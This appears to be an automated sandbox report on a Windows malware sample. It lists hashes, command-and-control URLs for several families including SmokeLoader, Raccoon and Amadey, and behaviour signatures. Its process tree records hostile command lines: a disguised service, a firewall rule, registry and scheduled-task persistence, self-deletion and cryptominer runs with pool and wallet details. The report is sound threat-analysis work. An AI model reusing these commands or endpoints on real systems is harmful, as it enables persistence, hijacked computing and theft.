Analysis
-
max time kernel
4265010s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
14-01-2022 17:03
General
-
Target
571324619fe74cf3215e6b058f36695577e235bea8b15ac841ec47fe961e0978.exe
-
Size
313KB
-
MD5
49bfab3a90a6c2888231dfc9b310d872
-
SHA1
fba06ed36393ea3700efbf11c7b1f63e4b6d48f8
-
SHA256
571324619fe74cf3215e6b058f36695577e235bea8b15ac841ec47fe961e0978
-
SHA512
249abb9d7652b6c5bd001989776467b937ed9144edf11b9f9017f6cf8ccfd5683be2f06c9145285939e7940ecb312a09fd49ee739ff2627e5bc592b83fb1fcd2
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://host-data-coin-11.com/
http://file-coin-host-12.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
rc4.i32
rc4.i32
rc4.i32
rc4.i32
Extracted
Family
arkei
Botnet
Default
C2
http://file-file-host4.com/tratata.php
Extracted
Family
tofsee
C2
patmushta.info
parubey.info
Extracted
Family
raccoon
Version
1.8.4-hotfixs
rc4.plain
rc4.plain
Extracted
Family
amadey
Version
3.01
C2
185.215.113.35/d2VxjasuwS/index.php
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Arkei
Arkei is an infostealer written in C++.
-
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Arkei Stealer Payload 2 IoCs
-
LoaderBot executable 2 IoCs
-
XMRig Miner Payload 2 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Detects Pyinstaller 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 25 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 34 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\571324619fe74cf3215e6b058f36695577e235bea8b15ac841ec47fe961e0978.exe"C:\Users\Admin\AppData\Local\Temp\571324619fe74cf3215e6b058f36695577e235bea8b15ac841ec47fe961e0978.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\571324619fe74cf3215e6b058f36695577e235bea8b15ac841ec47fe961e0978.exe"C:\Users\Admin\AppData\Local\Temp\571324619fe74cf3215e6b058f36695577e235bea8b15ac841ec47fe961e0978.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Windows\system32\MusNotification.exeC:\Windows\system32\MusNotification.exe1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\9BAF.exeC:\Users\Admin\AppData\Local\Temp\9BAF.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\A0D1.exeC:\Users\Admin\AppData\Local\Temp\A0D1.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\A0D1.exeC:\Users\Admin\AppData\Local\Temp\A0D1.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\A566.exeC:\Users\Admin\AppData\Local\Temp\A566.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 5522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\A9EB.exeC:\Users\Admin\AppData\Local\Temp\A9EB.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bktfcjcw\2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zpzbnwns.exe" C:\Windows\SysWOW64\bktfcjcw\2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create bktfcjcw binPath= "C:\Windows\SysWOW64\bktfcjcw\zpzbnwns.exe /d\"C:\Users\Admin\AppData\Local\Temp\A9EB.exe\"" type= own start= auto DisplayName= "wifi support"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description bktfcjcw "wifi internet conection"2⤵
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start bktfcjcw2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 10442⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\ABB1.exeC:\Users\Admin\AppData\Local\Temp\ABB1.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 9523⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\AD39.exeC:\Users\Admin\AppData\Local\Temp\AD39.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AD39.exeC:\Users\Admin\AppData\Local\Temp\AD39.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Gorged.exe"C:\Users\Admin\AppData\Local\Temp\Gorged.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Gorged.exeC:\Users\Admin\AppData\Local\Temp\Gorged.exe4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1edhp75⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0xfc,0x100,0xac,0x104,0x7ffbc27246f8,0x7ffbc2724708,0x7ffbc27247186⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,1061125717532905990,12923933826609215757,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:26⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,1061125717532905990,12923933826609215757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:36⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,1061125717532905990,12923933826609215757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:86⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1061125717532905990,12923933826609215757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,1061125717532905990,12923933826609215757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:16⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,1061125717532905990,12923933826609215757,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5224 /prefetch:86⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\srvs.exe"C:\Users\Admin\AppData\Local\Temp\srvs.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 17886⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\svs.exe"C:\Users\Admin\AppData\Local\Temp\svs.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im svs.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\svs.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im svs.exe /f7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ferrari2.exe"C:\Users\Admin\AppData\Local\Temp\ferrari2.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 16604⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 12804⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\bktfcjcw\zpzbnwns.exeC:\Windows\SysWOW64\bktfcjcw\zpzbnwns.exe /d"C:\Users\Admin\AppData\Local\Temp\A9EB.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 5082⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2856 -ip 28561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3972 -ip 39721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3540 -ip 35401⤵
-
C:\Users\Admin\AppData\Local\Temp\D6B.exeC:\Users\Admin\AppData\Local\Temp\D6B.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\4⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 11002⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1880 -ip 18801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\180A.exeC:\Users\Admin\AppData\Local\Temp\180A.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 4442⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 4402⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3952 -ip 39521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1628 -ip 16281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1B38.exeC:\Users\Admin\AppData\Local\Temp\1B38.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1E37.exeC:\Users\Admin\AppData\Local\Temp\1E37.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3952 -ip 39521⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 8722⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\3152.exeC:\Users\Admin\AppData\Local\Temp\3152.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\3152.exeC:\Users\Admin\AppData\Local\Temp\3152.exe2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\111.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\111.exeC:\Users\Admin\AppData\Local\Temp\111.exe4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 9925⤵
- Program crash
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\2.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\2.exeC:\Users\Admin\AppData\Local\Temp\2.exe4⤵
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 15⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1352 -s 7566⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 15⤵
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\3D88.exeC:\Users\Admin\AppData\Local\Temp\3D88.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 4522⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 524 -s 4602⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 936 -ip 9361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 524 -ip 5241⤵
-
C:\Users\Admin\AppData\Local\Temp\4644.exeC:\Users\Admin\AppData\Local\Temp\4644.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 4522⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 4602⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 524 -ip 5241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 320 -ip 3201⤵
-
C:\Users\Admin\AppData\Local\Temp\4CFB.exeC:\Users\Admin\AppData\Local\Temp\4CFB.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\5336.exeC:\Users\Admin\AppData\Local\Temp\5336.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 9523⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 320 -ip 3201⤵
-
C:\Users\Admin\AppData\Local\Temp\64FA.exeC:\Users\Admin\AppData\Local\Temp\64FA.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 4442⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 4882⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4040 -ip 40401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2888 -ip 28881⤵
-
C:\Users\Admin\AppData\Local\Temp\6E32.exeC:\Users\Admin\AppData\Local\Temp\6E32.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 4442⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 4522⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\775B.exeC:\Users\Admin\AppData\Local\Temp\775B.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7C4E.exeC:\Users\Admin\AppData\Local\Temp\7C4E.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 4442⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 4522⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3848 -ip 38481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4040 -ip 40401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3560 -ip 35601⤵
-
C:\Users\Admin\AppData\Local\Temp\87A9.exeC:\Users\Admin\AppData\Local\Temp\87A9.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 4522⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 932 -ip 9321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 932 -ip 9321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 3560 -ip 35601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3848 -ip 38481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2884 -ip 28841⤵
-
C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exeC:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1568 -ip 15681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 864 -ip 8641⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 1352 -ip 13521⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
-
Filesize
120KB
-
Filesize
240KB
-
Filesize
128KB
-
Filesize
1.0MB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
5.6MB
-
Filesize
120KB
-
Filesize
72KB
-
Filesize
584KB
-
Filesize
472KB
-
Filesize
408KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
24KB
-
Filesize
28KB
-
Filesize
2.1MB
-
Filesize
84KB
-
Filesize
20KB
-
Filesize
4.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
428KB
-
Filesize
464KB
-
Filesize
2.1MB
-
Filesize
548KB
-
Filesize
5.7MB
-
Filesize
4.3MB
-
Filesize
4.3MB
-
Filesize
4KB
-
Filesize
640KB
-
Filesize
768KB
-
Filesize
39.8MB
-
Filesize
660KB
-
Filesize
39.8MB
-
Filesize
39.8MB
-
Filesize
39.8MB
-
Filesize
39.8MB
-
Filesize
1.1MB
-
Filesize
4KB
-
Filesize
236KB
-
Filesize
188KB
-
Filesize
176KB
-
Filesize
588KB
-
Filesize
588KB
-
Filesize
588KB
-
Filesize
224KB
-
Filesize
120KB
-
Filesize
1.5MB
-
Filesize
36KB
-
Filesize
64KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
36KB
-
Filesize
64KB
-
Filesize
1.4MB
-
Filesize
68KB
-
Filesize
112KB
-
Filesize
588KB
-
Filesize
784KB
-
Filesize
784KB
-
Filesize
8KB
-
Filesize
784KB
-
Filesize
5.6MB
-
Filesize
552KB
-
Filesize
552KB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
276KB
-
Filesize
6.1MB
-
Filesize
1.0MB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
408KB
-
Filesize
240KB
-
Filesize
72KB
-
Filesize
524KB
-
Filesize
548KB
-
Filesize
304KB
-
Filesize
524KB
-
Filesize
2.1MB
-
Filesize
5.7MB
-
Filesize
524KB
-
Filesize
4KB
-
Filesize
524KB
-
Filesize
964KB
-
Filesize
964KB
-
Filesize
328KB
-
Filesize
36KB
-
Filesize
36KB
-
Filesize
64KB
-
Filesize
1.4MB
-
Filesize
5.6MB
-
Filesize
48KB
-
Filesize
5.6MB
-
Filesize
48KB
-
Filesize
584KB
-
Filesize
40KB
-
Filesize
5.6MB
-
Filesize
28KB
-
Filesize
48KB
-
Filesize
128KB
-
Filesize
384KB
-
Filesize
76KB
-
Filesize
68KB
-
Filesize
1.4MB